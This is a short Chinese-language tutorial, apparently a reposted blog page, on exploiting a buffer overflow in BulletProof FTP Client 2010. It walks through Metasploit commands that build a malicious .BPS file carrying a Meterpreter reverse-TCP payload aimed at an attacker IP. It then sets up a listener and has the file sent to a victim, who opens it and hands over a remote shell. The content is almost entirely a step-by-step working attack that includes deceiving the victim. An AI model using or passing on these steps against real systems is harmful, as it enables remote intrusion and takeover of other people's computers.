使用BulletProof FTP客户端BPS缓冲区溢出来利用Windows PC

此模块利用BulletProof FTP Client 2010中基于堆栈的缓冲区溢出漏洞,该漏洞由过长的主机名引起。通过说服受害者打开特制的.BPS文件,远程攻击者可以在系统上执行任意代码或导致应用程序崩溃。此模块已在Windows XP SP3上成功测试。


利用目标

BulletProof FTP客户端2010


需求

攻击者:kali Linux
受害者PC:Windows XP 3
打开Kali终端类型  msfconsole
使用BulletProof FTP客户端BPS缓冲区溢出来利用Windows PC
现在输入  exploit use / windows / fileformat / bpftp_client_bps_bof
msf exploit (bpftp_client_bps_bof)>set payload windows/meterpreter/reverse_tcp
msf exploit (bpftp_client_bps_bof)>set lhost 192.168.0.107 (IP of Local Host)
msf exploit (bpftp_client_bps_bof)>exploit
使用BulletProof FTP客户端BPS缓冲区溢出来利用Windows PC
在我们成功生成恶意  bps文件后,它将存储在您的本地计算机上
/root/.msf4/local/msf.bps
使用BulletProof FTP客户端BPS缓冲区溢出来利用Windows PC
现在我们需要设置一个监听器来处理攻击成功执行时受害者发送的反向连接。
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.107
exploit
现在 ,只要下载并打开它们,就会将msf.bps文件发送  给受害者。现在您可以访问受害计算机上的meterpreter shell。
使用BulletProof FTP客户端BPS缓冲区溢出来利用Windows PC
转载请注明本文链接: http://www.mayidui.net/t2407.html
游客
登录后才可以回帖,登录 或者 注册